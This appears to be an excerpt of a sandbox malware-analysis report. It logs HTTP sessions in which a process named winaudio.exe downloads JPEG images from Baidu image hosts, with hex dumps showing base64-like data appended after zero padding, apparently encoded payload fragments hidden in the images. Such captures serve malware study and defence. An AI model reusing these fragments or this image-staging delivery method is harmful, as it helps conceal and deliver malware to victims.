                      Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 00 8c 00 8c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 00 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff c4 00 35 10 01 00 01 03 02 04 05 01 06 06 03 01 01 00 00 00 01 02 00 03 11 04 21 05 12 31 41 06 51 61 71 91 81 13 14 22 93 b1 d1 23 32 52 54 a1 c1 34 42 e1 33 f0 ff c4 00 18 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff c4 00 20 11 01 01 00 03 00 02 02 03 01 00 00 00 00 00 00 00 01 00 02 11 21 03 31 41 61 12 13 51 32 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 cf 93 c2 e4 a3 94 f9 a2 94 8c ed bd 04 4e bd 3c eb 4b 9a 72 19 c8 2e 4f 30 a5 21 1c bd 9e d9 a6 a0 a2 6f b5 1c e6 e7 3f a5 11 38 4c 54 df 1d 53 3d 69 73 2e dc 90 46 12 4f 3e 5d bd a9 3a 08 37 35 41 0b 6c d0 ce 03 38 f5 6b 4f a2 8b 28 24 ed a5 c8 b8 e5 4d c3 b3 fe 29 2e a6 1b ab f8 45 c9 e3 51 66 e0 82 8e c6 e2 1b 3f 15 a3 d3 69 ec 91 b5 67 76 2e f9 a8 26 98 8b f6 8c 08 49 5d 83 1b 77 a9 ba 78 4e d4 0e 75 51 d8 1c ed eb 52 d7 89 af 75 e5 bf c3 80 e8 18 c5 0b f7 54 63 1c 04 76 f5 a4 5a 97 39 1c 09 93 cf a5 22 e9 16 f1 3b 72 55 8b 19
                      Data Ascii: JFIFHHC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"5!1AQaq"#2RT4B3 !1AaQ2?N<Kr.O0!o?8LTS=is.FO>]:75Al8kO($M).EQf?igv.&I]wxNuQRuTcvZ9";rU
                      Jan 30, 2023 07:40:14.996685028 CET138INData Raw: 39 70 fa e3 cf d6 b1 cb 77 46 01 b9 26 53 3d 56 b1 fe 2f e1 ba d9 eb 3e fd a7 b2 ce d1 0e 5b 84 51 5f 5c 75 3e 99 ad a4 20 44 37 cd 09 c0 63 94 2a 0c b4 ee a7 11 35 71 ab f3 79 b9 2d 99 50 3e 94 c3 12 2e 33 99 77 7c ab 65 e2 df b9 da 9f d9 e9 e1
                      Data Ascii: 9pwF&S=V/>[Q_\u> D7c*5qy-P>.3w|ejnJ!+4kl])S3pcojjFX{UCc[QiEJR]_k|t4S,QN/[b$%5v7-]6i$2GI+s]!q
                      Jan 30, 2023 07:40:14.996732950 CET139INData Raw: bc 7b f9 b4 c7 c9 af 8a f3 c5 bc 17 51 ce ea ac da bb 76 53 96 f8 82 a1 e5 b7 40 ac b4 74 5a c3 67 47 a8 ca ef fc 29 6d fe 2a 5b 29 1d 27 2f 96 92 ce 6e dc f3 f9 6a b1 c7 46 b7 27 3d bb d5 1e 1a 3d 5b 3c ba 3d 46 0f 3b 52 ed f4 ab 5f 0b 59 d4 43
                      Data Ascii: {QvS@tZgG)m*[)'/njF'==[<=F;R_YCm0-gvpe?M]oGlcCb?3$_/WInZKr~dLdbC\n0\NXe."v_cjQ{S(z
                      Jan 30, 2023 07:40:14.996778011 CET141INData Raw: 26 a7 a9 ed 5a 16 53 4b 49 7d e8 da 27 a5 13 2b ff 00 0f f8 95 e1 d6 cd 2e aa 2c f4 e2 b0 94 7a c3 3d 4c 77 2b 4f ab e2 ab a6 8d dd 3d d2 10 9c 79 a3 3c 67 23 dc ce d5 cd de b5 b4 e0 0b a9 f0 97 d9 de fc 51 b7 72 44 47 b7 7a c7 c9 80 76 df c5 9a
                      Data Ascii: &ZSKI}'+.,z=Lw+O=y<g#QrDGzvq}o\,szMQlH*XF'(|Q[rTLc`^wW?ZKVzzP:UJ000000000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:14.996824980 CET142INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                      Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:14.996862888 CET142INData Raw: ba 4f fb 34 3e 4a 0a 5f 04 0c 86 7a 7b 09 e3 f5 ee 8a 50 7c 61 c0 41 09 c6 a3 e8 dd 32 e9 be 10 9a 23 23 a3 7c 65 54 50 c0 08 7d 92 a3 97 b8 a6 2b 94 3d 94 21 27 f5 65 fc 6d 7f b1 e4 e4 c6 87 0d 82 a4 0c 19 b5 32 c1 da 82 fa 03 01 ca 30 c0 4f cc
                      Data Ascii: O4>J_z{P|aA2##|eTP}+=!'em20O>gg4A?Ble6e!-_iGTkJ8g ._6\e%agOf.x3r<8e5LHWaUY_$l05}XF&


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      4192.168.2.349709104.193.88.10980C:\Users\user\Desktop\winaudio.exe
                      TimestampkBytes transferredDirectionData
                      Jan 30, 2023 07:40:16.064955950 CET143OUTGET /tieba/pic/item/0e2442a7d933c89543ffe42fde1373f0830200e4.jpg HTTP/1.1
                      Host:imgsrc.baidu.com
                      Connection:close
                      Jan 30, 2023 07:40:16.234508991 CET145INHTTP/1.1 200 OK
                      Server: JSP3/2.0.14
                      Date: Mon, 30 Jan 2023 06:40:34 GMT
                      Content-Type: image/jpeg
                      Content-Length: 6829
                      Connection: close
                      Expires: Wed, 15 Feb 2023 07:57:31 GMT
                      Last-Modified: Sat, 03 Jan 1970 00:00:00 GMT
                      ETag: 6f2aeabeb70a38ae92c7977c66f44aa8
                      Age: 1204965
                      Accept-Ranges: bytes
                      Access-Control-Allow-Origin: *
                      Ohc-Global-Saved-Time: Mon, 16 Jan 2023 07:57:31 GMT
                      Ohc-Cache-HIT: sfo01-sys-jorcol09.sfo01.baidu.com [2]
                      Ohc-Response-Time: 1 0 0 0 0 0
                      Data Raw: ff d8 ff e1 00 a9 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 06 01 1a 00 04 00 00 00 01 00 00 01 2c 01 1b 00 04 00 00 00 01 00 00 01 2c 01 28 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 31 00 02 00 00 00 13 00 00 00 54 87 69 00 04 00 00 00 01 00 00 00 6b 00 00 50 6f 6c 61 72 72 20 50 68 6f 74 6f 20 45 64 69 74 6f 72 00 00 00 00 00 04 a0 02 00 04 00 00 00 01 00 00 00 64 a0 03 00 04 00 00 00 01 00 00 00 42 a0 01 00 03 00 00 00 01 00 01 00 00 90 00 00 07 00 00 00 04 30 32 33 31 00 00 00 00 ff db 00 84 00 0a 07 07 08 07 06 0a 08 08 08 0b 0a 0a 0b 0e 18 10 0e 0d 0d 0e 1d 15 16 11 18 23 1f 25 24 22 1f 22 21 26 2b 37 2f 26 29 34 29 21 22 30 41 31 34 39 3b 3e 3e 3e 25 2e 44 49 43 3c 48 37 3d 3e 3b 01 0a 0b 0b 0e 0d 0e 1c 10 10 1c 3b 28 22 28 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b ff c0 00 11 08 00 42 00 64 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 e1 a3 77 ec 86 b0 68 e7 2e 43 3c aa 31 cd 66 e2 80 b2 97 85 07 20 d4 72 5c 5a 96 52 f1 19 40 23 ad 43 a6 fa 0c b2 b1 5b c8 32 1b 06 b1 6e 48
                      Data Ascii: ExifMM*,,(1TikPolarr Photo EditordB0231#%$""!&+7/&)4)!"0A149;>>>%.DIC<H7=>;;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;Bd}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?wh.C<1f r\ZR@#C[2nH
                      Jan 30, 2023 07:40:16.234559059 CET146INData Raw: 2c 8d 1b 58 2e 02 e2 06 67 c0 c9 c0 cd 4f 23 9a d8 36 12 e3 ed 45 3e 78 8f e2 2a 15 2b 3b b1 6a 43 10 01 72 e0 83 54 d5 de 83 2c a1 50 b9 f3 3f 3a 89 45 8e e2 34 b1 b1 fb c3 34 ac c6 43 28 42 b9 dc 2a 95 c2 e5 59 04 0e 40 24 66 9b 72 48 71 b5 f5
                      Data Ascii: ,X.gO#6E>x*+;jCrT,P?:E44C(B*Y@$frHq*bUv'[+W9jGHgZ]KX IPDNf6tBT%Sb9OHVjs{%6RW6E,{dEpG e|/],ky|N~:0.Kycy^i>/u=E
                      Jan 30, 2023 07:40:16.234606981 CET147INData Raw: 8a b4 ca e5 b1 dc 0c 7f 8d 29 26 d8 27 63 9f d6 f5 48 60 b5 fb 24 8e 46 ec 31 07 bf 35 96 22 ea 1c a8 c6 a4 8c 41 2c 4b 08 92 39 f2 ec 49 0a 5b a0 af 37 96 ef 63 3b d8 8b ed cf 6d 78 27 8d f9 18 38 cd 5c 63 75 63 d0 8c b4 4d 1d 4e 99 f6 93 67 25
                      Data Ascii: )&'cH`$F15"A,K9I[7c;mx'8\cucMNg%B=+QQ5vq<#tthO}*GmG#*YsZ&mUYU=m<q8iFvS"~+l5+.pTmRin];V6zy#SgX-
                      Jan 30, 2023 07:40:16.234652996 CET149INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                      Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:16.234754086 CET150INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                      Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:16.234798908 CET151INData Raw: 39 66 7a 57 35 7a 32 43 66 39 0a 41 65 76 53 73 6d 6b 55 4a 36 76 66 6f 76 51 46 46 78 4f 67 71 75 75 51 46 4f 72 4b 6e 36 67 36 58 59 47 7a 72 31 66 30 34 68 37 71 50 41 4b 52 30 6b 78 62 65 4a 57 43 79 6b 76 45 70 53 76 30 0a 64 43 46 53 6d 78
                      Data Ascii: 9fzW5z2Cf9AevSsmkUJ6vfovQFFxOgquuQFOrKn6g6XYGzr1f04h7qPAKR0kxbeJWCykvEpSv0dCFSmx/00VbOptr0NROjbf0tLR+2Kdw+GpAP0O3l3ErMUHmCynIVIqOVAoGBANZfKs2JV0oPZ2c+mexKFmuIHspk1+3sLocaxgoGKAh+SKqOGAjOPQveqccSxPxCKb9Rx66jCYnqsEzcdQdA+6wVxes2zdSW7G5FQHrHu


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      5192.168.2.349710185.10.104.11580C:\Users\user\Desktop\winaudio.exe
                      TimestampkBytes transferredDirectionData
                      Jan 30, 2023 07:40:17.952861071 CET153OUTGET /bjh/3c7bec031bab48d4084b19b5f2a8b07b.jpeg HTTP/1.1
                      Host:pic.rmb.bdstatic.com
                      Connection:close
                      Jan 30, 2023 07:40:17.974710941 CET154INHTTP/1.1 200 OK
                      Server: JSP3/2.0.14
                      Date: Mon, 30 Jan 2023 06:40:17 GMT
                      Content-Type: image/jpeg
                      Content-Length: 5976
                      Connection: close
                      Expires: Thu, 02 Feb 2023 05:46:23 GMT
                      Last-Modified: Mon, 30 Jan 2023 05:46:23 GMT
                      ETag: "3c7bec031bab48d4084b19b5f2a8b07b"
                      Age: 345
                      Accept-Ranges: bytes
                      Content-MD5: PHvsAxurSNQISxm18qiwew==
                      x-bce-content-crc32: 449646581
                      x-bce-debug-id: YnOB77IblCyOGJm2i8t1xcD3n7RChwIjRofu8XPDRO2Ildh+n9qjjIGHIikmMqb/rU4uATKWOLMuzjameV5Vtw==
                      x-bce-request-id: 6819dc9d-0aa8-4efa-9ced-f0c7cec76096
                      x-bce-storage-class: STANDARD
                      Timing-Allow-Origin: *
                      Ohc-Global-Saved-Time: Mon, 30 Jan 2023 05:46:23 GMT
                      Ohc-Cache-HIT: fra01-sys-jomo4.fra01.baidu.com [2], zhuzuncache59 [2], xaix67 [1]
                      Ohc-File-Size: 5976
                      X-Cache-Status: HIT
                      Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 00 8c 00 8c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 00 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff c4 00 35 10 01 00 01 03 02 04 05 01 06 06 03 01 01 00 00 00 01 02 00 03 11 04 21 05 12 31 41 06 51 61 71 91 81 13 14 22 93 b1 d1 23 32 52 54 a1 c1 34 42 e1 33 f0 ff c4 00 18 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff c4 00 20 11 01 01 00 03 00 02 02 03 01 00 00 00 00 00 00 00 01 00 02 11 21 03 31 41 61 12 13 51 32 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 cf 93 c2 e4 a3 94 f9 a2 94 8c ed bd 04 4e bd 3c eb 4b 9a 72 19 c8 2e 4f 30 a5 21 1c bd 9e d9 a6 a0 a2 6f b5 1c e6 e7 3f a5 11 38 4c 54 df 1d 53 3d 69 73 2e dc 90 46 12 4f 3e 5d bd a9 3a 08 37 35 41 0b 6c d0 ce 03 38 f5 6b 4f a2 8b 28 24 ed a5 c8 b8 e5 4d c3 b3 fe 29 2e a6 1b ab f8 45 c9 e3 51 66 e0 82 8e c6 e2 1b 3f 15 a3 d3 69 ec 91 b5 67 76 2e f9 a8 26 98 8b f6 8c 08 49 5d 83 1b 77 a9 ba 78 4e d4 0e 75 51 d8 1c ed eb 52 d7 89 af 75 e5 bf c3 80 e8 18 c5 0b f7 54 63 1c 04 76 f5 a4 5a 97 39 1c 09 93 cf a5 22 e9 16 f1 3b 72 55 8b 19 39
                      Data Ascii: JFIFHHC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"5!1AQaq"#2RT4B3 !1AaQ2?N<Kr.O0!o?8LTS=is.FO>]:75Al8kO($M).EQf?igv.&I]wxNuQRuTcvZ9";rU9
                      Jan 30, 2023 07:40:17.974766016 CET155INData Raw: 70 fa e3 cf d6 b1 cb 77 46 01 b9 26 53 3d 56 b1 fe 2f e1 ba d9 eb 3e fd a7 b2 ce d1 0e 5b 84 51 5f 5c 75 3e 99 ad a4 20 44 37 cd 09 c0 63 94 2a 0c b4 ee a7 11 35 71 ab f3 79 b9 2d 99 50 3e 94 c3 12 2e 33 99 77 7c ab 65 e2 df b9 da 9f d9 e9 e1 6a
                      Data Ascii: pwF&S=V/>[Q_\u> D7c*5qy-P>.3w|ejnJ!+4kl])S3pcojjFX{UCc[QiEJR]_k|t4S,QN/[b$%5v7-]6i$2GI+s]!q]
                      Jan 30, 2023 07:40:17.974817038 CET157INData Raw: 7b f9 b4 c7 c9 af 8a f3 c5 bc 17 51 ce ea ac da bb 76 53 96 f8 82 a1 e5 b7 40 ac b4 74 5a c3 67 47 a8 ca ef fc 29 6d fe 2a 5b 29 1d 27 2f 96 92 ce 6e dc f3 f9 6a b1 c7 46 b7 27 3d bb d5 1e 1a 3d 5b 3c ba 3d 46 0f 3b 52 ed f4 ab 5f 0b 59 d4 43 89
                      Data Ascii: {QvS@tZgG)m*[)'/njF'==[<=F;R_YCm0-gvpe?M]oGlcCb?3$_/WInZKr~dLdbC\n0\NXe."v_cjQ{S(z*
                      Jan 30, 2023 07:40:17.975811958 CET158INData Raw: a7 a9 ed 5a 16 53 4b 49 7d e8 da 27 a5 13 2b ff 00 0f f8 95 e1 d6 cd 2e aa 2c f4 e2 b0 94 7a c3 3d 4c 77 2b 4f ab e2 ab a6 8d dd 3d d2 10 9c 79 a3 3c 67 23 dc ce d5 cd de b5 b4 e0 0b a9 f0 97 d9 de fc 51 b7 72 44 47 b7 7a c7 c9 80 76 df c5 9a f2
                      Data Ascii: ZSKI}'+.,z=Lw+O=y<g#QrDGzvq}o\,szMQlH*XF'(|Q[rTLc`^wW?ZKVzzP:UJ0000000000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:17.975881100 CET159INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                      Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:17.975922108 CET160INData Raw: 4f fb 34 3e 4a 0a 5f 04 0c 86 7a 7b 09 e3 f5 ee 8a 50 7c 61 c0 41 09 c6 a3 e8 dd 32 e9 be 10 9a 23 23 a3 7c 65 54 50 c0 08 7d 92 a3 97 b8 a6 2b 94 3d 94 21 27 f5 65 fc 6d 7f b1 e4 e4 c6 87 0d 82 a4 0c 19 b5 32 c1 da 82 fa 03 01 ca 30 c0 4f cc 3e
                      Data Ascii: O4>J_z{P|aA2##|eTP}+=!'em20O>gg4A?Ble6e!-_iGTkJ8g ._6\e%agOf.x3r<8e5LHWaUY_$l05}XF&


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      6192.168.2.349711185.10.104.12080C:\Users\user\Desktop\winaudio.exe
                      TimestampkBytes transferredDirectionData
                      Jan 30, 2023 07:40:18.620254040 CET161OUTGET /tieba/pic/item/314e251f95cad1c8c61b8073703e6709c83d51c5.jpg HTTP/1.1
                      Host:imgsrc.baidu.com
                      Connection:close
                      Jan 30, 2023 07:40:18.640527964 CET162INHTTP/1.1 200 OK
                      Server: JSP3/2.0.14
                      Date: Mon, 30 Jan 2023 06:40:18 GMT
                      Content-Type: image/jpeg
                      Content-Length: 5982
                      Connection: close
                      Expires: Sun, 12 Feb 2023 03:07:07 GMT
                      Last-Modified: Sat, 03 Jan 1970 00:00:00 GMT
                      ETag: 15e2776767d587d501bf567983d93a42
                      Age: 1481591
                      Accept-Ranges: bytes
                      Access-Control-Allow-Origin: *
                      Ohc-Global-Saved-Time: Fri, 13 Jan 2023 03:07:07 GMT
                      Ohc-Cache-HIT: fra01-sys-jomo2.fra01.baidu.com [2]
                      Ohc-Response-Time: 1 0 0 0 0 0
                      Data Raw: ff d8 ff e1 00 a9 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 06 01 1a 00 04 00 00 00 01 00 00 01 2c 01 1b 00 04 00 00 00 01 00 00 01 2c 01 28 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 31 00 02 00 00 00 13 00 00 00 54 87 69 00 04 00 00 00 01 00 00 00 6b 00 00 50 6f 6c 61 72 72 20 50 68 6f 74 6f 20 45 64 69 74 6f 72 00 00 00 00 00 04 a0 02 00 04 00 00 00 01 00 00 00 64 a0 03 00 04 00 00 00 01 00 00 00 42 a0 01 00 03 00 00 00 01 00 01 00 00 90 00 00 07 00 00 00 04 30 32 33 31 00 00 00 00 ff db 00 84 00 0a 07 07 08 07 06 0a 08 08 08 0b 0a 0a 0b 0e 18 10 0e 0d 0d 0e 1d 15 16 11 18 23 1f 25 24 22 1f 22 21 26 2b 37 2f 26 29 34 29 21 22 30 41 31 34 39 3b 3e 3e 3e 25 2e 44 49 43 3c 48 37 3d 3e 3b 01 0a 0b 0b 0e 0d 0e 1c 10 10 1c 3b 28 22 28 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b ff c0 00 11 08 00 42 00 64 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 e1 a3 77 ec 86 b0 68 e7 2e 43 3c aa 31 cd 66 e2 80 b2 97 85 07 20 d4 72 5c 5a 96 52 f1 19 40 23 ad 43 a6 fa 0c b2 b1 5b c8 32 1b 06 b1 6e 48 2c 8d 1b
                      Data Ascii: ExifMM*,,(1TikPolarr Photo EditordB0231#%$""!&+7/&)4)!"0A149;>>>%.DIC<H7=>;;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;Bd}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?wh.C<1f r\ZR@#C[2nH,
                      Jan 30, 2023 07:40:18.640578032 CET163INData Raw: 58 2e 02 e2 06 67 c0 c9 c0 cd 4f 23 9a d8 36 12 e3 ed 45 3e 78 8f e2 2a 15 2b 3b b1 6a 43 10 01 72 e0 83 54 d5 de 83 2c a1 50 b9 f3 3f 3a 89 45 8e e2 34 b1 b1 fb c3 34 ac c6 43 28 42 b9 dc 2a 95 c2 e5 59 04 0e 40 24 66 9b 72 48 71 b5 f5 2a c9 62
                      Data Ascii: X.gO#6E>x*+;jCrT,P?:E44C(B*Y@$frHq*bUv'[+W9jGHgZ]KX IPDNf6tBT%Sb9OHVjs{%6RW6E,{dEpG e|/],ky|N~:0.Kycy^i>/u=ErJ*
                      Jan 30, 2023 07:40:18.640623093 CET165INData Raw: e5 b1 dc 0c 7f 8d 29 26 d8 27 63 9f d6 f5 48 60 b5 fb 24 8e 46 ec 31 07 bf 35 96 22 ea 1c a8 c6 a4 8c 41 2c 4b 08 92 39 f2 ec 49 0a 5b a0 af 37 96 ef 63 3b d8 8b ed cf 6d 78 27 8d f9 18 38 cd 5c 63 75 63 d0 8c b4 4d 1d 4e 99 f6 93 67 25 f4 cf b5
                      Data Ascii: )&'cH`$F15"A,K9I[7c;mx'8\cucMNg%B=+QQ5vq<#tthO}*GmG#*YsZ&mUYU=m<q8iFvS"~+l5+.pTmRin];V6zy#SgX-
                      Jan 30, 2023 07:40:18.641262054 CET166INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                      Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
